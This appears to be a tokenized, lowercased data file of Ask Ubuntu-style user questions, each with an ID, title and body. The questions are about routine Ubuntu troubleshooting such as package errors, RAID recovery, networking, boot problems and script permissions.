487871	db5 error ( -30969 ) from dbenv- > open : bdb0091 db_version_mismatch : database environment version mismatch	i am using ubuntu 14.04 lts and trying to unzip rpm file like sudo alien -- scripts -d oracle-xe-11.2.0-1.0.x86_64.rpm i am getting like error : db5 error ( -30969 ) from dbenv- > open : bdb0091 db_version_mismatch : database environment version mismatch error : can not open packages index using db5 - ( -30969 ) error : can not open packages database in /root/.rpmdb any one please help me
487873	how to recover ubuntu image that is locking up	i was trying to disable the onboard wifi module in my laptop by using this command : iface wlan0 inet manual i placed in my /etc/wireless/interfaces file and restarted the newtwork manager . i rebooted machine and it times out waiting for network connection and goes to a blank screen . i tried connecting the ethernet port so it could acquire inet but does nothing . my laptop is basically bricked . is there anyway to recover this ? or is it time for an ubuntu reinstall ?
487875	request help with ibm serial parallel usb adapter	i am in the earliest stages of ccna certification and i 've decided to make it harder on myself by using ubuntu ; an os that i have very little experience with . the install went flawlessly and so far i 'm loving some ubuntu ! ! ! i have a device that attached to my pc via usb called an ibm usb serial parallel adapter . this device is necessary for me to connect to a cisco router 's console ( serial ) port . so i go into putty and i do n't know how to configure it to tell it that the serial commands get to the adapter via a specific usb port . in win 7 , there 's a drop down in putty that lists the serial adapter on a given usb port , but there 's no equivalent in the ubuntu/linux version of putty . i 've tried to research the issue myself and learned a little about the lsusb command and even tried to substitute some of the info from a lusb -d command into putty but with no luck . i then tried to find linux drivers for the device with no luck . also , if there 's something silly i did not do , please call it out so i can help myself and potentially others in the future ! ! !
487877	kde 4.13.2 update breaks login from lightdm on kubuntu 14.04	one of the kde updates that rolled out in the last couple of days broke my ability to log in to kde from lightdm using the lightdm-kde-greeter . at the lightdm prompt , i enter my login credentials , the dialog boxes disappear , and nothing happens . system : kubuntu 14.04 on kde 4.13.2
487879	what disadvantages come with using tlp ?	i use ubuntu on desktops and laptops and am making a custom script to set things up for my school . i just discovered tlp to improve power comsumption for the laptops and want to include it in my script . most of what i hear is great . web upd8 and makeuseof seem to recommend it . yet , it is not included with any version or derivative of ubuntu that i know of . arch linux includes it in it 's official repositories , but ubuntu requires adding a third party ppa . so , this leads me to believe that is has enough issues or is too new to include by default or even in the default repositories . am i asking for trouble by installing it on desktop hardware , or will it just stay in the ac mode and have no effect ? will i likely see any kernel freezing or instability with ubuntu 12.04 and tlp ? has anyone had any cause to remove tlp ?
487880	problem in copying file	i 'm using seagate 2tb expansion external harddisk there is some problem in copying the media files ( video , audio ) i mean that after copying the file they exist in harddisk but not playing they show error in playing.only few files are copying without error.there is no problem in source file .
487881	no longer showing `` x packages can be updated '' on command line login	when i ssh into my ubuntu server , it used to show a message like this : 10 packages can be updated . 6 updates are security updates . now it no longer shows this message . i know that apt already knows about the updates , because if i run apt-get upgrade without running apt-get update first , it will show the list of packages to be updated . how do i get it back ?
487882	unable to boot ubuntu from hard drive after installation of 14.04 hp hp 110-210 desktop pc	after successful installation of ubuntu 14.04 i can not boot from hard drive . instead i get the message `` no operating system installed '' , unless i manually start a boot from cd . when i do boot from the cd i am running a live session . what am i doing wrong here ? i have tested my memory , disk and drive . they all check out ok . i have looked at other similar questions but not found a solution .
487884	ora-27101 : shared memory realm does not exist	i am using ubuntu 14.04 i had installed oracle 11g but , its not work properly.given the below commands and getting like below root @ madhu-lenovo-g500 : ~ # sqlplus sql*plus : release 11.2.0.2.0 production on wed jun 25 08:51:11 2014 copyright ( c ) 1982 , 2011 , oracle . all rights reserved . enter user-name : system/root error : ora-01034 : oracle not available ora-27101 : shared memory realm does not exist linux-x86_64 error : 2 : no such file or directory process id : 0 session id : 0 serial number : 0 any one please help me
487886	the best site to find ppa repositories	yes i am looking for sites like ubuntuupdates.org/ppas i am looking for a site where i can get a list of every single ppa or at-least quite a few i was told their is a site that lists all of them so i would like to go through it and get more of my repositories
487889	problem to establish internet connection	when i click on 'connection information ' to see ipv4 and ipv6 , it seems disabled . so , i ca n't able to see the ip address . i am on a network over pppoe through lan port . i am not able to establish internet connection . please help how to set up connection .
487893	2-disk raid array missing one disk . fdisk sees them both . missing disk is `` non-fresh '' . what to do ?	i have two physical 500 gb hard disks in my ubuntu 12.04.4 pc and they are supposed to be in a 2-disk raid array . however , mdadm -d /dev/md0 is reporting that /dev/sda seems to be inoperative , even after a reboot : /dev/md0 : version : 1.2 creation time : sat oct 12 20:01:52 2013 raid level : raid1 array size : 471531328 ( 449.69 gib 482.85 gb ) used dev size : 471531328 ( 449.69 gib 482.85 gb ) raid devices : 2 total devices : 1 persistence : superblock is persistent update time : tue jun 24 22:57:41 2014 state : clean , degraded active devices : 1 working devices : 1 failed devices : 0 spare devices : 0 name : xxxxx:0 ( local to host xxxxx ) uuid : d87b72eb:17425250 : dfbf806f:60eba0fc events : 4482651 number major minor raiddevice state 0 0 0 0 removed 1 8 17 1 active sync /dev/sdb1 similarly for md1 and sda5/sdb5 . fdisk sees both sda and sdb . i see this in /proc/mdstat : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md1 : active raid1 sdb5 [ 1 ] 16712576 blocks super 1.2 [ 2/1 ] [ _u ] md0 : active raid1 sdb1 [ 1 ] 471531328 blocks super 1.2 [ 2/1 ] [ _u ] unused devices : < none > dmesg shows this : [ 2.187963 ] md : linear personality registered for level -1 [ 2.189389 ] md : multipath personality registered for level -4 [ 2.190202 ] md : raid0 personality registered for level 0 [ 2.191153 ] md : raid1 personality registered for level 1 [ 2.329273 ] md : bind < sda1 > [ 2.330746 ] md : bind < sda5 > [ 2.342623 ] md : bind < sdb1 > [ 2.343018 ] md : kicking non-fresh sda1 from array ! [ 2.343022 ] md : unbind < sda1 > [ 2.435343 ] md : raid6 personality registered for level 6 [ 2.435346 ] md : raid5 personality registered for level 5 [ 2.435348 ] md : raid4 personality registered for level 4 [ 2.437993 ] md : raid10 personality registered for level 10 [ 2.439651 ] md : export_rdev ( sda1 ) [ 2.440324 ] md/raid1 : md0 : active with 1 out of 2 mirrors [ 2.440341 ] md0 : detected capacity change from 0 to 482848079872 [ 2.460418 ] md0 : unknown partition table [ 2.481119 ] md : bind < sdb5 > [ 2.483049 ] md : kicking non-fresh sda5 from array ! [ 2.483066 ] md : unbind < sda5 > [ 2.486916 ] md : export_rdev ( sda5 ) [ 2.487564 ] md/raid1 : md1 : active with 1 out of 2 mirrors [ 2.487578 ] md1 : detected capacity change from 0 to 17113677824 [ 2.495906 ] md1 : unknown partition table what is this `` non-fresh sda1 '' message ? i have seen this message on linuxquestions.org . should i do what it says , i.e . : /sbin/mdadm /dev/md0 -- fail /dev/sda1 -- remove /dev/sda1 /sbin/mdadm /dev/md0 -- add /dev/sda1 /sbin/mdadm /dev/md1 -- fail /dev/sda5 -- remove /dev/sda5 /sbin/mdadm /dev/md1 -- add /dev/sda5 i assume that this would not affect sdb in any way . thanks .
487894	how do you backup a set of files on a macbookpro to an ubuntu folder ?	my family each has a macbookpro . we would like to back up certain files to my ubuntu machine . i have set up a folder , backups on the ubuntu machine 's storage drive . in that backups folder are three folders , call them mom , dad and child . i went into ubuntu and created an [ accounts ] area in the smb.cfg file that has the user names the paths ... /storage/backups/child etc ... i created the smbuser and put those in . each user can log into the server using their username and password just fine . they can see the directed path and navigate to it . but that 's as far as it goes . they ca n't drag and drop anything from their notebook to the server . when i query that folder on the macbook pro , it says user can only read . yet , in the [ accounts ] block i put in create mode 0777 and write mode 0777 . what have i missed that the user does n't have access to copy files to the ubuntu folder ? thanks !
487895	empty variables in python	this snippet is from my python for biologists book : genomic = open ( `` genomic_dna.txt '' ) .read ( ) exons = open ( `` exons.txt '' ) for line in exons : positions = line.split ( ' , ' ) start = int ( positions [ 0 ] ) stop = int ( positions [ 1 ] ) exons = genomic [ start : stop ] coding_seq = coding_seq + exon print ( `` coding sequence is : `` + coding_seq ) according to the book , this should work , but when i run it , i get a name error `` coding_seq is not defined . '' as i understand it , python is a dynamic language , so i should n't have to explicitly declare coding_seq before i use it in my loop . why is n't this code working correctly ?
487899	how to chabge gdm login theme in ubuntu 12.04 lts	i have ubuntu 12.04 lts and i changed my login screen to gdm by typing sudo apt-get install gdm how do i change the theme in ubuntu 12.04 ? i downloaded a theme using gnome-look.org . where do i extract the theme and how do i apply it ?
487904	upgrading php_codesniffer from software center	i have installed the php_codesniffer from ubuntu software center , this gives me the version 1.1.0 what i 'm trying to do is update it the latest stable version . seeing this came from software center , i ca n't update the package using pear install php_codesnieffer-1.4.2 which returns no releases available for package `` pear.php.net/php_codesnieffer '' install failed i also tried updating using pear pear upgrade php_codesniffer but it returns nothing to upgrade
487906	deploying multiple services in lxc containers in a vm hangs	to get started with juju , i installed it on a local machine ( actually a xubuntu vm running on windows ) . juju-gui got deployed successfully . then used the gui to deploy mysql . but it 's been hours and still juju status returns environment : local machines : `` 0 '' : agent-state : started agent-version : 1.18.1.1 dns-name : localhost instance-id : localhost series : trusty `` 1 '' : agent-state : started agent-version : 1.18.1.1 dns-name : 10.0.3.154 instance-id : atech-local-machine-1 series : trusty hardware : arch=i386 `` 2 '' : instance-id : pending series : precise `` 3 '' : instance-id : pending series : precise `` 4 '' : instance-id : pending series : precise services : juju-gui : charm : cs : trusty/juju-gui-3 exposed : true units : juju-gui/0 : agent-state : started agent-version : 1.18.1.1 machine : `` 1 '' open-ports : - 80/tcp - 443/tcp public-address : 10.0.3.154 mysql : charm : cs : precise/mysql-46 exposed : true relations : cluster : - mysql units : mysql/0 : agent-state : pending machine : `` 4 '' what went wrong ? my understanding is that it first installs a lxc and then mysql on it . how do i check whether the status of these ? checked /var/log/juju/all-machines.log . there are quite number of errors . the most repeated one being machine-0 : 2014-06-25 04:33:28 error juju runner.go:220 worker : exited `` environ-provisioner '' : failed to process updated machines : can not start machine 2 : no matching tools available
487908	how to safely uninstall ubuntu - help needed !	i have been dual-booting windows 8 and ubuntu . the time has come for me to quit on ubuntu and i need to know how to safely uninstall it . i have heard from many that once ubuntu is uninstalled , there is no longer a way to boot to windows . i checked this link out : http : //www.makeuseof.com/tag/how-to-safely-uninstall-ubuntu-in-windows-dual-boot-environment/ do i need a windows 8 recovery disk/usb to make this work ? ( i do n't have a cd slot by the way ) has anyone ever tried this method ? ca n't one just click f9 upon boot to enter cmd and follow through with this method ? thanks !
487911	thunar not authorized to acces mounted volumes	i 'm running a minimal ubuntu with fluxbox as wm and no display manager . i start fluxbox with startx and mainly use the fluxbox startup script for my application autostart which includes `` thunar -- daemon '' i 'm using thunar with thunar-volman as my file manager but i 'm unable to access mounted volumes with thunar . they appear on the side bar but when i click the volume it prompts the following message : failed to mount `` volume '' : not authorized to perform the operation
487912	how do i solve the error problem while running ' sudo nautilus ' in kubuntu 14.04 ?	when i run command $ sudo nautilus , i am getting the following error message : ** ( nautilus:2611 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-jjkuqbopps : connection refused ( nautilus:2611 ) : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( nautilus:2611 ) : ibus-warning ** : the owner of /home/nit/.config/ibus/bus is not root ! how could i solve it ?
487914	error while running mysql 5.6 service in ubuntu 14.04	i need to setup mysql5.6 server in ubuntu 14.04 ( 32 bit ) . i downloaded mysql-server_5.6.19-1ubuntu14.04_i386.deb-bundle.tar from official site , then installed with : dpkg -i mysql-5.6.16-debian6.0-x86_64.deb for server , coummunuty etc which all comes in the tar file one by one . steps i followed are mentioned in this site i can see myconf.cnf file also . but when i executed the command to start mysql service it gave me this error : error : mysql service uynrecognized . kindly tell me what went wrong with my installation . its very urgent . kindly help . i thing i figured out is i forgot to install libaio1 . is this causing the issue ? if yes , do i need to uninstall mysql and install libaio1 first then mysql ? output of dpkg -- get-selections | grep mysql command is coming as : libmysqlclient18 : i386 install mysql-common install mysql-community-client install mysql-community-server install
487918	using ubuntu for android using kivy	i just want to ask can i use ubuntu 14.04 for developing an android application using kivy ? and if so , then which packages do i need to download from kivy 's website ? ?
487920	how to control programs run at startup ?	i have wicd , hplib and psensor installed . but they all always a run at startup in kde environment . how can i stop them running at startup ?
487925	weird internal microphone level	this is abnormal properly , when i set this mic level into 40-50 % level , the level is too high than normal level condition ( usually quite low level ) . formely , i set into that level and microphone level is not as high as the level as usual . can you fix this ?
487926	how to configure pythonpath in apache2	the default version of python in my ubuntu ( 12.04 ) is 2.7 . for python2.7 projects , i am configuring like this : < location `` /callcentre '' > sethandler python-program pythonhandler django.core.handlers.modpython setenv django_settings_module callcentre.settings pythoninterpreter callcentre pythondebug on pythonpath `` [ '/home/user/env/callcentreenv/lib/python2.7/site-packages ' , '/home/user/env/callcentreenv/ ' ] + sys.path '' < /location > and it is working perfectly . now what i want is to create a new project using python3.2 . and i do n't know how to configure it in appache as the sys.path is pointing to default python2.7
487927	multiple unity bars on 1 display since software update ( ubuntu 14.04 )	i am a new user of linux ( ubuntu 14.04 lts 64-bits , in a virtual machine under vmware player 6.0.2 build-1744117 running in windows 7 64-bits ) . everything was working fine , but yesterday , i made a series of automatic software updates in ubuntu and since then , my screen ( 1 monitor ) is divided horizontally and i have several times the same desktop , side by side , each with one unity bar , desktop and the open windows . the first `` screen '' ( unity bar , desktop and windows ) on the left is the only working one , the other replicates more on the right are just displayed but can not be interacted with . the `` screens '' are taking all the height of the monitor but only about 250-300 pixels in width , whatever resolution i set for the display . this is happening from the login screen to the closing of the computer is there someone that could have an idea on how to restore a normal display ? thank you , olivier
487930	dlna/upnp servers not working	i had been using rygel , mediatomb and xbmc as dlna servers on ubuntu 12.04 . they were all working fine , until they stopped . i can not detect any of the servers on my other devices even though the upnp control point shows that they are running . ubuntu recognises my other devices and these devices recognise each other too .
487932	from ubuntu , change default boot os -dual boot	i have a dual boot system ( windows 7 and ubuntu ) . currently the default os on startup is ubuntu . i want to change the default boot os from ubuntu to windows ( ubuntu- > windows ) i.e . on startup windows should boot by default . boot sequence is to be changed from while i am on ubuntu side . i know that this can be done from windows side using bcdedit.exe . one possible solution is to load the registry ( mount windows file system and go to windows/system32/config ) and edit the registry values ( using chntpw ) . but i do n't know which values i should change . thanks
487934	ubuntu 14.04 restarts computer after running gui	first i installed 13.04 and everything was working properly . but then after upgrading to 14.04 it wo n't start . sure , it 's booting . i see grub2 menu . ubuntu loading screen appears . then gui shows and device is restarting . it also happens when i try to run 14.04 live cd . both from cd and usb key . maybe something with bios configuration is wrong . i have preinstalled win8 alongside with ubuntu and using amd 64bit .
487935	ca n't join domain in ubuntu 14.04	i have an ubuntu 14.04 pc and want to connect it to our dc . everytime i try to join the domain it comes up with this error message : error : lsass error [ code 0x00080047 ] 9502 ( 0x251e ) dns_error_bad_packet - a bad packet was received from a dns server . potentially the requested address does not exist . i ran the lw command and it came up with the below : dwdomaincontrolleraddresstype = 23 dwflags = 504 dwversion = 5 wlmtoken = 65535 wnttoken = 65535 pszdomaincontrollername = dc3-vm-svr.shjmun.dom pszdomaincontrolleraddress = 192.168.10.52 pucdomainguid ( hex ) = 88 cc d4 26 47 da 10 4f b6 3a 54 bf ba d8 e4 79 psznetbiosdomainname = shjmun pszfullyqualifieddomainname = shjmun.dom pszdnsforestname = shjmun.dom pszdcsitename = shjmun pszclientsitename = shjmun psznetbioshostname = dc3-vm-svr pszusername = < empty > what could i do to address this issue ?
487936	how do i open fixed window in firefox ?	i 'm essentially wanting to create a desktop shortcut to open a window of firefox without tabs , locked address bar , no menu , etc . similar to what some pop ups look like or what chromium desktop apps look like . what options can i use to accomplish this from the command line ?
487940	get ip of system in local network	how can i find the ip of my ubuntu system in local network‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌ ?
487946	wifi seems network but stops at requesting wifi address	i just installed lubuntu on my packard bell easynote r3500 . network by cable works like a charm but wifi does not . wifi sees the networks but when connecting to it it keeps hanging at 'requesting a wifi network address for ... ' ifconfig : eth0 link encap : ethernet hwaddr 00:40 : d0 : a2 : d8:4e inet addr:192.168.1.130 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :240 : d0ff : fea2 : d84e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13202 errors:0 dropped:0 overruns:0 frame:0 tx packets:10135 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:10873803 ( 10.8 mb ) tx bytes:1349539 ( 1.3 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2194 errors:0 dropped:0 overruns:0 frame:0 tx packets:2194 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:203532 ( 203.5 kb ) tx bytes:203532 ( 203.5 kb ) wlan0 link encap : ethernet hwaddr 00:10:60 : af:16 : f5 inet6 addr : fe80 : :210:60ff : feaf:16f5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:156 errors:0 dropped:0 overruns:0 frame:0 tx packets:257 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:21022 ( 21.0 kb ) tx bytes:43020 ( 43.0 kb ) connecting to a wifi without a password also does not work . kind regards , paul
487948	octave error when trying to open image file	when i run this command : imread ( 'filename.bmp ' ) i got this error : error : imformats : support for image io was disabled when octave was built i dont know what is wrong . running in ubuntu 12.04 , octave 3.8.1 , packages installed : control 2.2.3 , general 1.3.2 , image 2.2.1 , io 2.2.2 , miscellaneous 1.2.1 , optim 1.3.1 , signal 1.2.0 , specfun 1.1.0 , statistics 1.2.3 , struct 1.0.10
487949	ubuntu 14.04 and libdvdcss file	i have ubuntu 14.04 and i ca n't get it to recognize libdvdcss2 , which is downloaded to the download file . there i clicked on the bz2 file and it opened to give me a nice neat package that does n't work . what do i need to do or try . keep in mind i am a newbie .
487950	howto setup qualcomm gobi1000 hp un2400-module mobile broadband on compaq mini 110 - 110c-1010so	i need some help with setting up/finding drivers for qualcomm gobi1000 hp un2400-module for mobile broadband/internal sim card on ubuntu 12.04.4*/compaq mini 110 - 110c-1010so *os : ubuntu 12.04.4 ( or higher if this solves the problem ) sim-card tested in a usb modem , and it works . link to netbook and win drivers output of : lspci # lspci 00:00.0 host bridge : intel corporation mobile 945gse express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gse express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 02 ) 01:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 02:00.0 ethernet controller : qualcomm atheros ar8132 fast ethernet ( rev c0 ) output of : lsusb # lsusb bus 001 device 002 : id 10f1:1a0f importek bus 005 device 002 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
487955	apt get upgrade problem	i 've ealier tried to remove the nx server and then upgraded to ubunt 14.04 lts . now whenever i do a sudo apt get upgrade i receive the following error : setting up util-linux ( 2.20.1-5.1ubuntu20.1 ) ... update-alternatives : error : can not stat file '/usr/lib/nx/nxserver ' : not a directory dpkg : error processing package util-linux ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : util-linux e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo apt-get clean patrick @ patrick-nuc : /etc/apt $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : nxclient : depends : libstdc++2.10-glibc2.2 but it is not installable depends : libaudiofile0 but it is not installable plymouth-label : depends : libplymouth2 ( = 0.8.8-0ubuntu17 ) but 0.8.8-0ubuntu8 is installed depends : plymouth ( = 0.8.8-0ubuntu17 ) but 0.8.8-0ubuntu8 is installed and the output of sudo apt-get install -f command is as below , $ sudo apt-get install -f [ sudo ] password for patrick : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : expect libnx-xorg libxcomp3 libxcompext3 libxcompshad3 nx-common nxagent openjdk-7-jre-lib use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libplymouth2 plymouth upstart suggested packages : graphviz upstart-monitor the following packages will be removed : nxclient nxnode nxserver the following packages will be upgraded : libplymouth2 plymouth upstart 3 upgraded , 0 newly installed , 3 to remove and 1529 not upgraded . 70 not fully installed or removed . need to get 543 kb of archives . after this operation , 53,5 mb disk space will be freed . do you want to continue [ y/n ] ? y get:1 ... trusty/main upstart i386 1.12.1-0ubuntu4 [ 367 kb ] get:2 ... trusty/main plymouth i386 0.8.8-0ubuntu17 [ 98,9 kb ] get:3 ... trusty/main libplymouth2 i386 0.8.8-0ubuntu17 [ 76,8 kb ] fetched 543 kb in 0s ( 616 kb/s ) setting up util-linux ( 2.20.1-5.1ubuntu20.1 ) ... update-alternatives : error : can not stat file '/usr/lib/nx/nxserver ' : not a directory dpkg : error processing package util-linux ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : util-linux e : sub-process /usr/bin/dpkg returned an error code ( 1 )
487965	can i install desktop-environment from distro 's iso file ?	i am running ubuntu 14.04 32-bit ( default unity d.e . ) .i have xubuntu desktop ( 32-bit ) iso file ( image ) . so it must there xubuntu desktop environment inside iso file . i do n't want to install whole xubuntu os from iso ( by burning to disk and clean-install ) but only xubuntu desktop environment in my ubuntu 14.04 os . i know that i can install xubuntu d.e . by sudo apt-get install xubuntu-desktop in my current ubuntu 14.04 os . but can i install xubuntu desktop environment from xubuntu 's iso file ( instead of online by apt-get ) ? how to do that ?
487967	problems with gui for a user	suddenly my system crashed ( i do n't know why ) and my desktop looks ugly . additional there is no menu ( unity ) and i am not able to launch a terminal using short cuts . using a right-click i was able to get to the system settings and i created a new user . using this user , the desktop looks normal but i would like to fix the gui for the other one . would be nice , if someone has an idea ... : - ) thank you !
487968	lost files on upgrade to 14.04	i used a usb stick to upgrade from 12.04 to 14.04 . now i ca n't find my files - downloads , pictures etc . empty . tried to backup but ran out of drive memory , so guess they must be still on the drive . i may have put the wrong user name into the upgrade box . how can i restore my files ?
487971	problem in permission to execure python code for hadoop	i have installed hadoop-1.0.3 and executed an sample program wordcount successfully in my 14.04 following this link . i tried to write program in python by following here . i have copied the following code , # ! /usr/bin/env python import sys # input comes from stdin ( standard input ) for line in sys.stdin : # remove leading and trailing whitespace line = line.strip ( ) # split the line into words words = line.split ( ) # increase counters for word in words : # write the results to stdout ( standard output ) ; # what we output here will be the input for the # reduce step , i.e . the input for reducer.py # # tab-delimited ; the trivial word count is 1 print ' % s\t % s ' % ( word , 1 ) paste into a text editor and save the file as , /home/hadoopuser/mapper.py note : my hadoop user name is hadoopuser and given permission as , hadoopuser @ arul-pc : ~ $ sudo chmod +x /home/hadoopuser/mapper.py as well as saved the following code into /home/hadoopuser/reducer.py # ! /usr/bin/env python from operator import itemgetter import sys current_word = none current_count = 0 word = none # input comes from stdin for line in sys.stdin : # remove leading and trailing whitespace line = line.strip ( ) # parse the input we got from mapper.py word , count = line.split ( '\t ' , 1 ) # convert count ( currently a string ) to int try : count = int ( count ) except valueerror : # count was not a number , so silently # ignore/discard this line continue # this if-switch only works because hadoop sorts map output # by key ( here : word ) before it is passed to the reducer if current_word == word : current_count += count else : if current_word : # write result to stdout print ' % s\t % s ' % ( current_word , current_count ) current_count = count current_word = word # do not forget to output the last word if needed ! if current_word == word : print ' % s\t % s ' % ( current_word , current_count ) and so given permission to execute , hadoopuser @ arul-pc : ~ $ sudo chmod +x /home/hadoopuser/reducer.py when i tried , hadoopuser @ arul-pc : ~ $ echo `` aaa acc abc aaa aaa add arul `` | /home/hadoopuser/mapper.py i got response as , -su : /home/hadoopuser/mapper.py : permission denied i have also tried with sudo am getting same response . please give me a solution .
487973	can not install eclipse kepler ( 4.3 )	i tried installing eclipse directly from the repo using apt-get , but it gave a outdated version -- indigo 3.8 , which does not support several important plug-ins . so i started using eclipse kepler without installation i downloaded eclipse ( .tar.gz file ) and extracted it and ran it using the ./eclipse command which was running successfully , but it does not support plug-ins when running the eclipse executable ( eclipse x-ecutable ) this is from the downloaded package of eclipse kepler with bash . which didnât work because i can not get pydev and java ee plug-in , so i tried to install it by following the method here : installing eclipse kepler this created a broken desktop icon and i can not find any installation in dash i am currently running ubuntu 14.04 . is there any way to manually install a plug-in to the eclipse package which i am running manually if there is no installation solution ?
487974	activate wifi with password	is it somehow possible to set a password so that you ca n't turn on wifi ? thanks in advance christian ubuntu 14.04
487976	migrate live process from one machine to the other	i am going to work on a project in which one live process should migrate from one ubuntu machine to the other machine ( in a homogeneous environment ) so what are all the things i should know before this . everything will going to be be implemented from scratch , so which programming language i should use ?
487982	ubuntu 14.04 's software updater wo n't update certain packages	the ubuntu software updater refuses to show and update certain packages , even though they appear in synaptic and kde 's muon updater . is this normal behaviour ? there have been many other packages , over time , that software updater ( update-manager ) saw and installed successfully ... both before and after some of these `` hidden '' packages appeared . screenshot : update-manager ( left ) ca n't see any updates , but muon ( right ) can . this is on a fresh install of ubuntu 14.04 , and was happening even before installing kde .
487984	pentax pocketjet 3 plus - add printer	i have a pentax pocketjet 3 plus that i want to use with my linux machine but i ca n't find a linux driver , only windows one . is there anything that i can do to make it work or should i just forget this idea ? this is what i get from dmesg : [ 5562.920208 ] usb 2-3.4 : new full-speed usb device number 17 using ehci-pci [ 5563.014188 ] usb 2-3.4 : new usb device found , idvendor=0a17 , idproduct=3406 [ 5563.014195 ] usb 2-3.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 5563.014198 ] usb 2-3.4 : product : pocketjet3plusb [ 5563.014201 ] usb 2-3.4 : manufacturer : pentax [ 5563.014204 ] usb 2-3.4 : serialnumber : 54027 [ 5563.015492 ] usblp 2-3.4:1.0 : usblp1 : usb unidirectional printer dev 17 if 0 alt 0 proto 1 vid 0x0a17 pid 0x3406
487985	mount point causing problems to unmount other drives	for some reason , ubuntu created this mountpoint /media/ [ username ] /lacie whenever i connect a usb drive , even the lacie one , this mountpoint makes it imposible to safely remove the drives . for example , connecting my lacie hdd creates a point called /media/ [ username ] /lacie1 , and when i try to unmount i get this error : error unmounting /dev/sdb1 : command-line `umount `` /media/ [ username ] /lacie '' ' exited with non-zero exit status 1 : umount : /media/ [ username ] /lacie : not mounted the same happens to every usb drive . i tried to delete this mountpoint using terminal , but it says folder is n't empty . any advice ? thanks !
487987	moving photos from iphone to ubuntu	from ubuntu 10.04 onward , you can access your iphone photos by simply connecting it and navigating to the dcim folder . however , i 've noticed that when i move photos from my iphone by cutting them from the dcim folder and pasting them somewhere on my ubuntu setup , the photos ' thumbnails remain in the camera roll however when clicking on a photo to view it , the screen turns white . restarting the phone does n't help as well . how come ? how can i move photos out of the phone without keeping its thumbmail in the camera roll ? i 'm using ubuntu 14.04 , iphone 5s with ios 7.1.1
487990	ubuntu 14.04 lts - windows 8.1 update 1 dual boot	i downloaded the ubuntu 14.04 iso image file , i need to install it in a partition giving it at least 40gb ( my hd is 1tb ) . since i 've never formatted this computer , it is subdivided in 6 partitions : 800 mb - recovery ; 260 mb - efi ; 149,56 gb - c : - windows partition ; 140mb - recovery ; 758,56 gb - d : - data ; 21,70 gb - recovery ; i 'd like to install ubuntu in d , but i have a question : is there any risk to lose any data by subdividing the d : partition ? will i be able in future , if needed , to delete ubuntu and recover the whole d : partition ? thanks : )
487994	ubuntu 12.04 does not automatically upgrade to 14.04 . why ?	this maybe a silly question but it has racked my brain . my friend in college has received an upgrade for 14.04 on his ubuntu 13.04 . why do n't i get the same update on my 12.04 ? i have downloaded the iso of 14.04 but then i would have to redo everything that i did in 12.04 again . one another i have in mind : is 14.04 better than 12.04 ? is it worth replacing 12.04 ? should i do it if i am never gon na get an auto upgrade ? i have been using 12.04 and i like it . but i 'm always into trying new updated stuff . i 'm in a dilemma . thanks in advance ! : )
487997	how to identify broken symlinks ?	i have more than 1000 icons in a single directory and also there are hundreds of shortcuts ( symbolic links ? ) inside that directory with different names , some of symbolic links are broken , i need to find which symbolic links are broken . i tried using ls -l but it is difficult to use . how do i do that ? and is it possible to fix broken symbolic links . thanks
487998	file script not saved as expected	when i try to edit a script ( with sublime text 3 ) the file is saved normally . but when i open the same file with gedit , the file is empty . also when i run the script ( .sh ) nothing happens unless i edit the script with gedit . is gedit the only editor for editing scripts ?
